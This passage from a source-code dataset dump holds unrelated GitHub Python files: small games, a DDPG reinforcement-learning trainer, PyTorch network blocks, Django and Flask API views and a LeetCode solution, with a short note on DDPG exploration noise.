안됩니다.\")\n \n elif True :\n strike = 0\n ball = 0\n out = 0\n for i in range(n):\n if usr_guess[i] == guess[i]:\n strike += 1\n elif usr_guess[i] in guess:\n ball += 1\n elif not usr_guess[i] in guess:\n out += 1\n if strike == n:\n end_time = time.time()\n print(f\"축하합니다. {count} 번 만에 정답입니다! 소요시간:{end_time-start_time:.2f}초 {datetime.now()}\")\n baseball2 = False\n baseball = False\n else:\n print(f\"\\n {strike} 스트라이크, {ball} 볼, {out} 아웃\")\n\"\"\"\n\n\n\n\"\"\"\n#다른 분이 짠 코드\n\nimport random\nimport time\nfrom datetime import datetime, timedelta\nprint(\"원하시는 자리 수를 입력하세요\")\nn = int(input())\nstart_time = time.time()\ndef baseball_number_generator(n):\n result = set()\n if n < 1:\n print(\"1이상의 값을 입력해주세요\")\n return False\n while len(result)计算梯度->反向传播\n self.actor_optimizer.zero_grad()\n actor_loss.backward()\n self.actor_optimizer.step()\n '''训练Critic'''\n # 利用r与s_计算出Q'(s_,a_),进而计算出Q(s,a)的target值\n a_target = self.actor_target(batch_s_)\n q_tmp = self.critic_target(batch_s_, a_target)\n q_target = batch_r + GAMMA * q_tmp\n # 计算Q(s,a)和loss\n q_eval = self.critic(batch_s, batch_a)\n td_error = self.loss_func(q_target, q_eval)\n self.critic_loss_list.append(td_error)\n # 更新critic的参数:梯度归零->计算梯度->反向传播\n self.critic_optimizer.zero_grad()\n td_error.backward()\n self.critic_optimizer.step()\n\n def save_model(self):\n torch.save(self.actor.state_dict(), 'actor_weights.pth')\n torch.save(self.critic.state_dict(), 'critic_weights.pth')\n\n\n# 配置gym\nenv = gym.make(ENV_NAME)\nenv = env.unwrapped\nenv.reset(seed=1)\ns_dim = env.observation_space.shape[0]\na_dim = env.action_space.shape[0] # 动作值为[a1,a2],a1控制油门,a2控制左右点火引擎,取值范围都为[-1,1]的实数\na_bound = env.action_space.high\na_low_bound = env.action_space.low\n\nddpg = DDPG(a_dim, s_dim, a_bound)\nvar = 3 # 加入噪声用到的正态分布中的标准差\nt1 = time.time()\nreward_list = []\nfor i in range(EPISODES):\n s = env.reset()\n ep_r = 0 # 每一个episode的累积奖励值\n for j in range(EP_STEPS):\n if RENDER: env.render()\n # 加入噪声\n a = ddpg.choose_action(s)\n a = np.clip(np.random.normal(a, var), a_low_bound, a_bound)\n s_, r, done, _, info = env.step(a)\n ddpg.store_experiences(s, a, r , s_) # 存储与环境互动经验\n if ddpg.pointer > MEMORY_CAPACITY:\n var *= 0.9999 # decay the exploration controller factor\n ddpg.learn()\n\n s = s_\n ep_r += r\n if j == EP_STEPS - 1:\n reward_list.append(ep_r)\n print('Episode: ', i, ' Reward: %i' % ep_r, 'Explore: %.2f' % var)\n\n if i > 0 and i % 50 == 0:\n ddpg.save_model()\n x = range(0, i + 1)\n plt.plot(x, reward_list, '.-')\n plt.xlabel(\"episode\")\n plt.ylabel(\"reward\")\n 
plt.show()\nprint('Running time: ', time.time() - t1)\n","repo_name":"Lwon2001/ReinforcementLearning","sub_path":"DDPG/ddpg.py","file_name":"ddpg.py","file_ext":"py","file_size_in_byte":7030,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
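+The training loop above explores by jittering the deterministic action with gaussian noise whose standard deviation (var) is annealed once the replay buffer is full. The same pattern in isolation, with made-up bounds and policy output:
+
+import numpy as np
+
+a_low, a_high = -1.0, 1.0  # hypothetical action bounds
+var = 3.0                  # exploration std, as in the record
+a = 0.2                    # deterministic policy output (made up)
+for step in range(5):
+    noisy = np.clip(np.random.normal(a, var), a_low, a_high)
+    var *= 0.9999          # slowly reduce exploration
+    print(step, noisy, var)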
+{"seq_id":"10037338870","text":"import random\nimport pygame\nfrom pygame.locals import *\nimport sys\nfrom main_menu import Main_menu\nimport time\nfrom update_user import update_user\n\npygame.init()\n\nFramePerSec = pygame.time.Clock()\nclock = pygame.time.Clock()\n\nWIDTH = 599\nHEIGHT = 599\nRHEIGHT = 629\nBLOCK = int(30) # the size of every square\nLEVEL = 0\nSPEED = 10\nSCREEN = pygame.display.set_mode((WIDTH, RHEIGHT))\n\nsnake_color = (32, 32, 32)\nbackground_color = (33, 181, 250)\nf1_color = (82, 237, 65)\nf2_color = (82, 237, 65)\nf3_color = (82, 237, 65)\ntext_color = (255, 234, 0)\nhead_color = (255, 0, 0)\nborder_color = (128, 128, 128)\n\nscore_font = pygame.font.SysFont(\"Arial\", 15)\n\n\nclass Point:\n\tdef __init__(self, x, y):\n\t\tself.x = x\n\t\tself.y = y\n\n\nclass Snake:\n\tdef __init__(self, snake_pos):\n\t\tself.body = snake_pos\n\n\tdef draw(self):\n\t\t# draw body part\n\t\tfor body in self.body[1:]:\n\t\t\tpygame.draw.rect(\n\t\t\t\tSCREEN,\n\t\t\t\tsnake_color,\n\t\t\t\tpygame.Rect(\n\t\t\t\t\tbody.x * BLOCK,\n\t\t\t\t\tbody.y * BLOCK,\n\t\t\t\t\tBLOCK,\n\t\t\t\t\tBLOCK,\n\t\t\t\t)\n\t\t\t)\n\t\thead = self.body[0] # draw head\n\t\tpygame.draw.rect(\n\t\t\tSCREEN,\n\t\t\thead_color,\n\t\t\tpygame.Rect(\n\t\t\t\thead.x * BLOCK,\n\t\t\t\thead.y * BLOCK,\n\t\t\t\tBLOCK,\n\t\t\t\tBLOCK,\n\t\t\t)\n\t\t)\n\n\tdef move(self, dx, dy):\n\t\t# Move body\n\t\tfor idx in range(len(self.body) - 1, 0, -1):\n\t\t\tself.body[idx].x = self.body[idx - 1].x # position body[i] = body[i-1]\n\t\t\tself.body[idx].y = self.body[idx - 1].y\n\t\t# Move head\n\t\tself.body[0].x += dx\n\t\tself.body[0].y += dy\n\n\t\t# Check whether snake leaves the playing area\n\t\tif self.body[0].x > WIDTH // BLOCK:\n\t\t\tself.body[0].x = 0\n\t\telif self.body[0].x < 0:\n\t\t\tself.body[0].x = WIDTH // BLOCK\n\t\telif self.body[0].y < 0:\n\t\t\tself.body[0].y = WIDTH // BLOCK\n\t\telif self.body[0].y > HEIGHT // BLOCK:\n\t\t\tself.body[0].y = 0\n\n\tdef check_collision_food(self, food):\n\t\tif food.pos.x == self.body[0].x and food.pos.y == self.body[0].y:\n\t\t\treturn True\n\t\telse:\n\t\t\treturn False\n\n\tdef check_collision_border(self, borders):\n\t\tfor pos in borders:\n\t\t\tif pos.x == self.body[0].x and pos.y == self.body[0].y:\n\t\t\t\treturn True\n\n\t\treturn False\n\n\tdef check_collision_snake(self):\n\t\tfor pos in self.body[1:]:\n\t\t\tif self.body[0].x == pos.x and self.body[0].y == pos.y:\n\t\t\t\treturn True\n\t\treturn False\n\n\n\nclass Food:\n\tdef __init__(self):\n\t\tself.pos = None\n\t\tself.weight = None\n\t\tself.spawn_time = None\n\t\tself.color = None\n\n\tdef draw(self):\n\t\tif self.weight == 1:\n\t\t\tself.color = f1_color\n\t\telif self.weight == 2:\n\t\t\tself.color = f2_color\n\t\telif self.weight == 3:\n\t\t\tself.color = f3_color\n\n\t\tpygame.draw.rect(\n\t\t\tSCREEN,\n\t\t\tself.color,\n\t\t\tpygame.Rect(\n\t\t\t\tself.pos.x * BLOCK,\n\t\t\t\tself.pos.y * BLOCK,\n\t\t\t\tBLOCK,\n\t\t\t\tBLOCK,\n\t\t\t)\n\t\t)\n\n\tdef new_pos(self, snake_list, border_list):\n\t\twhile True:\n\t\t\tx, y = random.randint(0, WIDTH // BLOCK), random.randint(0, HEIGHT // BLOCK)\n\t\t\tpos = Point(x, y)\n\t\t\tif (pos not in border_list) and (pos not in snake_list):\n\t\t\t\treturn pos\n\n\tdef create_new(self, snake_list, border_list, cur_time):\n\t\tself.weight = random.randint(1, 3)\n\t\tself.pos = self.new_pos(snake_list, border_list)\n\t\tself.spawn_time = cur_time\n\nclass Border:\n\tdef __init__(self, lvl):\n\t\tself.lvl = lvl\n\t\tself.border_list = []\n\n\tdef 
load_border(self):\n\t\tpath = \"/Users/nurstanduisengaliyev/Documents/Python/pp2-22B031491/tsis10/SnakeGame/levels/\" + str(self.lvl) + \".txt\"\n\t\twith open(path, 'r') as f:\n\t\t\tborder_rows = f.readlines()\n\n\t\tfor i, line in enumerate(border_rows):\n\t\t\tfor j, value in enumerate(line):\n\t\t\t\tif value == '#':\n\t\t\t\t\tself.border_list.append(Point(j, i))\n\n\tdef draw(self):\n\t\tfor i in self.border_list:\n\t\t\tpygame.draw.rect(SCREEN, border_color, (i.x * BLOCK, i.y * BLOCK, BLOCK, BLOCK))\n\ndef get_string_body(body):\n\tstr1 = str(body[0].x) + \", \" + str(body[1].y)\n\tfor pos in body[1:]:\n\t\t# \"x, y; x2, y2; x3, y3\n\t\tstr1 += \"; \" + str(pos.x) + ', ' + str(pos.y)\n\treturn str1\n\ndef draw_text(score, lvl):\n\ttxt_sur1 = score_font.render(f\"Score = {score}\", True, (0, 0, 0))\n\ttxt_sur2 = score_font.render(f\"Level = {lvl}\", True, (0, 0, 0))\n\tSCREEN.blit(txt_sur1, (15, (HEIGHT // BLOCK + 1) * BLOCK + 5))\n\tSCREEN.blit(txt_sur2, (WIDTH - 100, (HEIGHT // BLOCK + 1) * BLOCK + 5))\n\ndef runGame(username, lvl, score, snake_pos, direction):\n\tpygame.display.set_caption(\"SnakeGame\")\n\t# now, with currect state, we will state our game\n\t# 0 - left, 1 - right, 2 - up, 3 - down\n\t# created borders\n\tdx, dy = 0, 0\n\tif direction == 0:\n\t\tdx, dy = -1, 0\n\tif direction == 1:\n\t\tdx, dy = 1, 0\n\tif direction == 2:\n\t\tdx, dy = 0, -1\n\tif direction == 3:\n\t\tdx, dy = 0, 1\n\t# 0 - left, 1 - right, 2 - up, 3 - down\n\t# created dx, dy\n\tsnake = Snake(snake_pos)\n\tborder = Border(lvl)\n\tborder.load_border()\n\tfood = Food()\n\tfood.create_new(snake.body, border.border_list, time.time())\n\tis_started = False\n\tpause = False\n\twhile True:\n\t\tfor event in pygame.event.get():\n\t\t\tif event.type == QUIT:\n\t\t\t\t# closing the window, so we should insert into table current state\n\t\t\t\tcur_dir = None\n\t\t\t\tif dx == -1:\n\t\t\t\t\tcur_dir = 0\n\t\t\t\tif dx == 1:\n\t\t\t\t\tcur_dir = 1\n\t\t\t\tif dy == -1:\n\t\t\t\t\tcur_dir = 2\n\t\t\t\tif dy == 1:\n\t\t\t\t\tcur_dir = 3\n\t\t\t\tupdate_user(username, lvl, score, get_string_body(snake.body), cur_dir)\n\t\t\t\tpygame.quit()\n\t\t\t\tsys.exit()\n\t\t\tif event.type == KEYDOWN:\n\t\t\t\tif event.key == K_SPACE:\n\t\t\t\t\tpause = not pause\n\t\t\t\tif event.key == K_UP and dy != 1:\n\t\t\t\t\tdx, dy = 0, -1\n\t\t\t\t\tis_started = True\n\t\t\t\telif event.key == K_DOWN and dy != -1:\n\t\t\t\t\tdx, dy = 0, 1\n\t\t\t\t\tis_started = True\n\t\t\t\telif event.key == K_LEFT and dx != 1:\n\t\t\t\t\tdx, dy = -1, 0\n\t\t\t\t\tis_started = True\n\t\t\t\telif event.key == K_RIGHT and dx != -1:\n\t\t\t\t\tdx, dy = 1, 0\n\t\t\t\t\tis_started = True\n\n\t\tif pause == True:\n\t\t\tcontinue\n\t\tSPEED = min(9 * pow(1.30, score/4), 25)\n\t\ttail_pos = None\n\t\tif is_started:\n\t\t\ttail_pos = Point(snake.body[-1].x, snake.body[-1].y)\n\t\t\tsnake.move(dx, dy)\n\n\t\tif is_started and (snake.check_collision_snake() or snake.check_collision_border(border.border_list)):\n\t\t\t# Lost the game should insert into database (0, 0, )\n\t\t\tcur_dir = None\n\t\t\tif dx == -1:\n\t\t\t\tcur_dir = 0\n\t\t\tif dx == 1:\n\t\t\t\tcur_dir = 1\n\t\t\tif dy == -1:\n\t\t\t\tcur_dir = 2\n\t\t\tif dy == 1:\n\t\t\t\tcur_dir = 3\n\t\t\tbody_pos = f\"{WIDTH // 30 // 2}, {HEIGHT // 30 // 2}; {WIDTH // 30 // 2 + 1}, {HEIGHT // 30 // 2}\"\n\t\t\tupdate_user(username, 0, 0, body_pos, 0)\n\t\t\tpygame.quit()\n\t\t\tsys.exit()\n\n\n\t\tif is_started and snake.check_collision_food(food):\n\t\t\tscore += 
food.weight\n\t\t\tsnake.body.append(tail_pos)\n\t\t\tfood.create_new(snake.body, border.border_list, time.time())\n\n\t\tif time.time() - food.spawn_time >= 4:\n\t\t\tfood.create_new(snake.body, border.border_list, time.time())\n\n\n\t\tSCREEN.fill(background_color)\n\t\tpygame.draw.rect(SCREEN, (250, 250, 250), pygame.Rect(0, (HEIGHT // BLOCK + 1) * BLOCK, WIDTH, BLOCK))\n\t\tdraw_text(score, lvl)\n\t\tfood.draw()\n\t\tborder.draw()\n\t\tsnake.draw()\n\t\tpygame.display.update()\n\n\t\tif score >= 9 and lvl < 2: # next level\n\t\t\tlvl += 1\n\t\t\tscore = 0\n\t\t\tborder = Border(lvl)\n\t\t\tborder.load_border()\n\t\t\tpause = False\n\t\t\tis_started = False\n\t\t\tdx, dy = -1, 0\n\t\t\t# username, lvl, score, snake_pos, direction\n\t\t\tbody_pos = get_snake_pos(f\"{WIDTH // 30 // 2}, {HEIGHT // 30 // 2}; {WIDTH // 30 // 2 + 1}, {HEIGHT // 30 // 2}\")\n\t\t\tsnake = Snake(body_pos)\n\t\t\tfood.create_new(snake.body, border.border_list, time.time())\n\t\t\tcur_dir = None\n\t\t\tif dx == -1:\n\t\t\t\tcur_dir = 0\n\t\t\tif dx == 1:\n\t\t\t\tcur_dir = 1\n\t\t\tif dy == -1:\n\t\t\t\tcur_dir = 2\n\t\t\tif dy == 1:\n\t\t\t\tcur_dir = 3\n\t\t\tupdate_user(username, lvl, score, get_string_body(snake.body), cur_dir)\n\n\n\t\tclock.tick(SPEED)\n\n\n# lvl, score, body_pos, direction\n\ndef get_snake_pos(a):\n\tl1 = a.split(';')\n\tpositions = []\n\tfor pos in l1:\n\t\tx, y = pos.split(',')\n\t\tpositions.append(Point(int(x), int(y)))\n\n\treturn positions\n\ndef main():\n\tmainMenu = Main_menu(WIDTH, RHEIGHT)\n\tcur_state = mainMenu.runGame(SCREEN)\n\tsnake_pos = get_snake_pos(cur_state[3])\n\tusername = cur_state[0]\n\tlvl = cur_state[1]\n\tscore = cur_state[2]\n\tdirection = cur_state[4]\n\trunGame(username, lvl, score, snake_pos, direction)\n\nif __name__ == \"__main__\":\n\tmain()\n","repo_name":"NurstanDuisengaliyev/pp2-22B031491","sub_path":"tsis10/SnakeGame/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7865,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"3859008647","text":"T = int(input())\n\nfor _ in range(T):\n N = bin(int(input()))\n N = N[2:]\n\n answer = []\n\n for idx in range(len(N)):\n letter = int(N[len(N)-1-idx])\n\n if letter != 0:\n answer.append(str(idx))\n\n print(\" \".join(answer))\n","repo_name":"yeong-hwan/algorithm-study","sub_path":"yeonghwan/algorithm-boj/sep/3460.py","file_name":"3460.py","file_ext":"py","file_size_in_byte":253,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"71"}
+{"seq_id":"30703677946","text":"import torch\nimport numpy as np\n\nfrom torchvision import datasets\nimport torchvision.transforms as transforms\nfrom torch.utils.data.sampler import SubsetRandomSampler\nimport matplotlib.pyplot as plt\n\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\n#%matplotlib inline\n\nimport cv2\nfrom timeit import default_timer as timer\n\n\n\n# Residual block in bottleneck style\n# input: input depth\n# output with same shape as input\nclass ResidualBottleNeckBlock(nn.Module):\n def __init__(self, input_channels, bottleneck_ratio):\n super(ResidualBottleNeckBlock, self).__init__()\n self.reduction = nn.Conv2d(input_channels,input_channels//bottleneck_ratio,1)\n self.batch_red = nn.BatchNorm2d(input_channels//bottleneck_ratio)\n self.conv = nn.Conv2d(input_channels//bottleneck_ratio,input_channels//bottleneck_ratio,3,padding=1)\n self.batch_conv = nn.BatchNorm2d(input_channels//bottleneck_ratio)\n self.expansion = nn.Conv2d(input_channels//bottleneck_ratio,input_channels,1)\n self.batch_exp = nn.BatchNorm2d(input_channels)\n\n\n def forward(self, x):\n\n out = F.relu(self.batch_red(self.reduction(x)))\n out = F.relu(self.batch_conv(self.conv(out)))\n out = self.batch_exp(self.expansion(out))\n\n return F.relu(out+x)\n\n\n# Residual block in bottleneck style\n# input: input depth\n# output with same shape as input\nclass PreActivationResidualBlock(nn.Module):\n def __init__(self, input_channels):\n super(PreActivationResidualBlock, self).__init__()\n self.bn_1 = nn.BatchNorm2d(input_channels)\n self.conv_1 = nn.Conv2d(input_channels,input_channels,3,padding=1)\n self.bn_2 = nn.BatchNorm2d(input_channels)\n self.conv_2 = nn.Conv2d(input_channels,input_channels,3,padding=1)\n\n\n def forward(self, x):\n\n out = self.conv_1(F.relu(self.bn_1(x)))\n out = self.conv_2(F.relu(self.bn_2(out)))\n\n return out+x\n\n# Residual block in bottleneck style\n# input: input depth\n# output with double depth and half scale\nclass PreActivationReductionBlock(nn.Module):\n def __init__(self, input_channels):\n super(PreActivationReductionBlock, self).__init__()\n self.bn_1 = nn.BatchNorm2d(input_channels)\n self.conv_1 = nn.Conv2d(input_channels,2*input_channels,3,padding=1,stride=2)\n self.bn_2 = nn.BatchNorm2d(input_channels*2)\n self.conv_2 = nn.Conv2d(input_channels*2,input_channels*2,3,padding=1)\n\n\n def forward(self, x):\n\n out = self.conv_1(F.relu(self.bn_1(x)))\n out = self.conv_2(F.relu(self.bn_2(out)))\n\n return out\n\n\n# Squeeze and Excitation block\nclass SEblock(nn.Module):\n def __init__(self, input_channels, height, width, ratio):\n super(SEblock, self).__init__()\n self.input_channels = input_channels\n\n self.squeeze = nn.AvgPool2d((height,width),(height,width))\n self.fc = nn.Linear(input_channels,input_channels//ratio)\n self.excite = nn.Linear(input_channels//ratio,input_channels)\n\n def forward(self, x):\n\n se = self.squeeze(x)\n se = se.view(-1,self.input_channels)\n se = F.relu(self.fc(se))\n se = torch.sigmoid(self.excite(se))\n se = se.view(-1,self.input_channels,1,1)\n\n x = x * se.expand_as(x)\n\n return x\n\n\n#Squeee and Excitation Residual block with bottleneck style\nclass SE_ResidualBottleNeckBlock(nn.Module):\n def __init__(self, input_channels, height, width, bottleneck_ratio, se_ratio):\n super(SE_ResidualBottleNeckBlock, self).__init__()\n self.reduction = nn.Conv2d(input_channels,input_channels//bottleneck_ratio,1)\n self.batch_red = nn.BatchNorm2d(input_channels//bottleneck_ratio)\n self.conv = 
nn.Conv2d(input_channels//bottleneck_ratio,input_channels//bottleneck_ratio,3,padding=1)\n self.batch_conv = nn.BatchNorm2d(input_channels//bottleneck_ratio)\n self.expansion = nn.Conv2d(input_channels//bottleneck_ratio,input_channels,1)\n self.batch_exp = nn.BatchNorm2d(input_channels)\n\n self.se = SEblock(input_channels, height, width, se_ratio)\n\n\n def forward(self, x):\n\n out = F.relu(self.batch_red(self.reduction(x)))\n out = F.relu(self.batch_conv(self.conv(out)))\n out = self.batch_exp(self.expansion(out))\n\n # SE must be applied prior to the identity addition\n out = self.se(out)\n\n return F.relu(out+x)\n\nclass DenseBlock(nn.Module):\n def __init__(self, input_channels, inner_output, layers):\n super(DenseBlock, self).__init__()\n\n self.layers = layers\n self.reduction = nn.ModuleList([nn.Conv2d(input_channels+i*inner_output, inner_output,1) for i in range(layers)])\n self.conv = nn.ModuleList([nn.Conv2d(inner_output, inner_output,3,padding=1) for i in range(layers)])\n self.norm1 = nn.ModuleList([nn.BatchNorm2d(input_channels+i*inner_output) for i in range(layers)])\n self.norm2 = nn.ModuleList([nn.BatchNorm2d(inner_output) for i in range(layers)])\n\n\n def forward(self, x):\n\n for i in range(self.layers):\n out = self.norm1[i](x)\n out = F.relu(out)\n out = self.reduction[i](out)\n out = self.norm2[i](out)\n out = F.relu(out)\n out = self.conv[i](out)\n x = torch.cat((x,out),1)\n\n return x","repo_name":"RicardoBauchspiess/ComputerVision","sub_path":"Classification/CustomArchitecture/blocks.py","file_name":"blocks.py","file_ext":"py","file_size_in_byte":5336,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"34730847450","text":"from telebot import types\nfrom bot.bot_connection import bot\nfrom database.database_commands import search\n\n\ndef query_text(inline_query):\n try:\n result = list(\n map(lambda recipe: types.InlineQueryResultArticle(id=recipe[0],\n title=recipe[2], input_message_content=types.InputTextMessageContent(recipe[2])\n ),\n search('recipe', inline_query.query)\n ))\n\n bot.answer_inline_query(inline_query.id, result)\n except Exception as e:\n print(e)\n","repo_name":"leevayy/edabudet","sub_path":"inline.py","file_name":"inline.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"5369497356","text":"from .serializers import UserProfileSerializer\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework import status\nfrom rest_framework.parsers import MultiPartParser,FormParser\nfrom django.contrib.auth import get_user_model\nfrom .models import UserProfile\nUser = get_user_model()\n\nclass UserProfileView(APIView):\n\n # parser_classes = MultiPartParser, FormParser\n\n def get(self,request,*args,**kwargs):\n try:\n userprofile = UserProfile.objects.get(user=request.user)\n serializer = UserProfileSerializer(instance=userprofile)\n return Response(serializer.data,status=status.HTTP_200_OK)\n except UserProfile.DoesNotExist:\n return Response({'msg':'ok'},status=status.HTTP_304_NOT_MODIFIED)\n\n def post(self,request,format=None):\n data = request.data\n data['user'] = request.user\n try:\n UserProfile.objects.get(user=request.user)\n except Exception:\n UserProfile.objects.create(**data)\n return Response({'msg':'ok'})\n\n def put(self,request):\n user_profile = request.user.userprofile\n user_profile.country = request.data['country']\n user_profile.address = request.data['address']\n user_profile.save()\n return Response({'msg':\"updated\"})\n\n\n\n\n \n\n\n \n\n \n\n\n","repo_name":"rojit1/sg_app","sub_path":"userprofile/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1278,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"33388618151","text":"from flask import request\nfrom flask_restful import Resource\nfrom ..schema import *\nfrom ..business import MagnitudeBusiness\nfrom .query_params_helper import QueryParamsHelper\nimport json\n\nmagnitude_business = MagnitudeBusiness()\n\nclass MagnitudeListEndpoint(Resource):\n @staticmethod\n def get():\n #Get params from url\n page, per_page, order_by, order_by_descending = QueryParamsHelper.get_paged_params(request)\n #Get stations from business\n magnitudes = magnitude_business.get_magnitudes(page, per_page, order_by, order_by_descending)\n #Instance schema\n pfocollection_schema = get_pfo(MagnitudeDtoSchema)\n #Return json data\n return pfocollection_schema.dump(magnitudes, many=False)\n\nclass MagnitudeCreationEndpoint(Resource):\n @staticmethod\n def post():\n #Instance schema\n magnitude_creation_dto_schema = MagnitudeCreationDtoSchema()\n #Parse json to dto\n magnitude_creation_dto = magnitude_creation_dto_schema.loads(request.data)\n #Create magnitude\n return magnitude_business.create_magnitude(magnitude_creation_dto)\n\nclass MagnitudeUpdateEndpoint(Resource):\n @staticmethod\n def put():\n #Get params from url\n magnitude_id = request.args.get('id')\n #Instance schema\n magnitude_update_dto_schema = MagnitudeUpdateDtoSchema()\n #Parse json to dto\n magnitude_update_dto = magnitude_update_dto_schema.loads(request.data)\n #Create station\n return magnitude_business.update_magnitude(magnitude_id, magnitude_update_dto)\n\nclass MagnitudeBatchCreationEndpoint(Resource):\n @staticmethod\n def post():\n #Instance schema\n magnitude_creation_dto_schema = MagnitudeCreationDtoSchema()\n #Parse json to dto\n magnitude_creation_dto_list = magnitude_creation_dto_schema.loads(request.data, many=True)\n #Create measurement\n items_not_created = magnitude_business.create_magnitudes_in_batch(magnitude_creation_dto_list)\n #Instance result schema\n magnitude_batch_creation_result_dto_schema = BatchCreationResultDtoSchema()\n #Return json data\n return magnitude_batch_creation_result_dto_schema.dump(items_not_created, many=False)\n\nclass MagnitudeExistenceEndpoint(Resource):\n @staticmethod\n def get():\n #Get params from url\n magnitude_ids = request.args.getlist('ids')\n #Get not found magnitude ids\n magnitude_existence_dto = magnitude_business.magnitude_existence(magnitude_ids)\n #Instance schema\n magnitude_existence_dto_schema = ExistenceDtoSchema()\n #Return json data\n return magnitude_existence_dto_schema.dump(magnitude_existence_dto, many=False)\n\n","repo_name":"daviferna/borealis","sub_path":"Borealis.Api/app/api/magnitude_endpoint.py","file_name":"magnitude_endpoint.py","file_ext":"py","file_size_in_byte":2742,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"9342546652","text":"# 721. Accounts Merge\n# DescriptionHintsSubmissionsDiscussSolution\n# Given a list accounts, each element accounts[i] is a list of strings, where the first element accounts[i][0] is a name, and the rest of the elements are emails representing emails of the account.\n\n# Now, we would like to merge these accounts. Two accounts definitely belong to the same person if there is some email that is common to both accounts. Note that even if two accounts have the same name, they may belong to different people as people could have the same name. A person can have any number of accounts initially, but all of their accounts definitely have the same name.\n\n# After merging the accounts, return the accounts in the following format: the first element of each account is the name, and the rest of the elements are emails in sorted order. The accounts themselves can be returned in any order.\n\n# Example 1:\n# Input: \n# accounts = [[\"John\", \"johnsmith@mail.com\", \"john00@mail.com\"], [\"John\", \"johnnybravo@mail.com\"], [\"John\", \"johnsmith@mail.com\", \"john_newyork@mail.com\"], [\"Mary\", \"mary@mail.com\"]]\n# Output: [[\"John\", 'john00@mail.com', 'john_newyork@mail.com', 'johnsmith@mail.com'], [\"John\", \"johnnybravo@mail.com\"], [\"Mary\", \"mary@mail.com\"]]\n# Explanation: \n# The first and third John's are the same person as they have the common email \"johnsmith@mail.com\".\n# The second John and Mary are different people as none of their email addresses are used by other accounts.\n# We could return these lists in any order, for example the answer [['Mary', 'mary@mail.com'], ['John', 'johnnybravo@mail.com'], \n# ['John', 'john00@mail.com', 'john_newyork@mail.com', 'johnsmith@mail.com']] would still be accepted.\n# Note:\n\n# The length of accounts will be in the range [1, 1000].\n# The length of accounts[i] will be in the range [1, 10].\n# The length of accounts[i][j] will be in the range [1, 30].\n\nclass Solution(object):\n def accountsMerge(self, accounts):\n \"\"\"\n :type accounts: List[List[str]]\n :rtype: List[List[str]]\n \"\"\"\n # build graph\n email2acc = dict()\n for i, acc in enumerate(accounts):\n for email in acc[1:]:\n if email in email2acc:\n email2acc[email].append(i)\n else:\n email2acc[email] = [i]\n graph = [[] for _ in accounts]\n for i, acc in enumerate(accounts):\n for email in acc[1:]:\n graph[i] += email2acc[email]\n # traverse graph\n visited = set()\n res = []\n for i in range(len(graph)):\n if i in visited:\n continue\n acc = [accounts[i][0], []]\n # breath first search\n level = [i]\n while level:\n node = level.pop(0)\n if node in visited:\n continue\n visited.add(node)\n acc[1] += accounts[node][1:]\n for child in graph[node]:\n level.append(child)\n acc[1] = sorted(list(set(acc[1])))\n res.append([acc[0]] + acc[1])\n return res\n\n\n","repo_name":"chunjiw/leetcode","sub_path":"L721_accountsMerge.py","file_name":"L721_accountsMerge.py","file_ext":"py","file_size_in_byte":3132,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"2783218450","text":"# -*- coding: utf-8 -*-\nfrom flask import Blueprint, jsonify, request\nfrom werkzeug.utils import secure_filename\n\nimport json\nimport os\nimport config\nfrom mongo_data import commodity\nfrom mongoengine import *\n\n\nupload = Blueprint('upload', __name__)\n\n\n@upload.route(\"/upload/single\", methods=[\"POST\"])\ndef upload_single():\n data = request.data.decode(\"UTF-8\")\n ret = dict()\n ret[\"err_no\"] = 0\n ret[\"err_msg\"] = \"success\"\n try:\n data = json.loads(data)\n index = data[\"commodity_source\"] + data[\"source_id\"]\n comm = commodity.Commodity()\n comm.name = data[\"name\"]\n comm.description = data[\"description\"]\n comm.index = index\n comm.price_list = data[\"price_list\"]\n comm.expect_price = data[\"expect_price\"]\n comm.source_id = data[\"source_id\"]\n comm.commodity_source = data[\"commodity_source\"]\n comm.commodity_url = data[\"commodity_url\"]\n comm.save()\n except KeyError as e:\n ret[\"err_no\"] = 1\n ret[\"err_msg\"] = \"not have key\" + str(e)\n except ValueError:\n ret[\"err_no\"] = 1\n ret[\"err_msg\"] = \"json data resolve failed\"\n except NotUniqueError:\n ret[\"err_no\"] = 2\n ret[\"err_msg\"] = \"you must not upload the same information twice\"\n return jsonify(ret)\n\n\n@upload.route(\"/upload/multi\", methods=[\"POST\"])\ndef upload_multi():\n count = 0\n datas = request.data.decode(\"utf-8\")\n ret = dict()\n ret[\"err_no\"] = 0\n ret[\"err_msg\"] = \"0\"\n comms = []\n try:\n datas = json.loads(datas)\n for data in datas:\n index = data[\"commodity_source\"] + data[\"source_id\"]\n comm = commodity.Commodity()\n comm.name = data[\"name\"]\n comm.description = data[\"description\"]\n comm.price_list = data[\"price_list\"]\n comm.index = index\n comm.expect_price = data[\"expect_price\"]\n comm.source_id = data[\"source_id\"]\n comm.commodity_source = data[\"commodity_source\"]\n comm.commodity_url = data[\"commodity_url\"]\n count += 1\n comms.append(comm)\n commodity.Commodity.objects.insert(doc_or_docs=comms)\n except KeyError as e:\n ret[\"err_no\"] = 1\n ret[\"err_msg\"] = \"not have key\" + str(e)\n return jsonify(ret)\n except ValueError:\n ret[\"err_no\"] = 1\n ret[\"err_msg\"] = \"json data resolve failed\"\n return jsonify(ret)\n except NotUniqueError as e:\n ret[\"err_no\"] = 1\n ret[\"err_msg\"] = \"you must not upload the same information twice, \" + str(e)\n return jsonify(ret)\n ret[\"err_msg\"] = str(count)\n return jsonify(ret)\n\n\n@upload.route(\"/upload/imgupload//\", methods=[\"POST\"])\ndef imgupload(source_id, 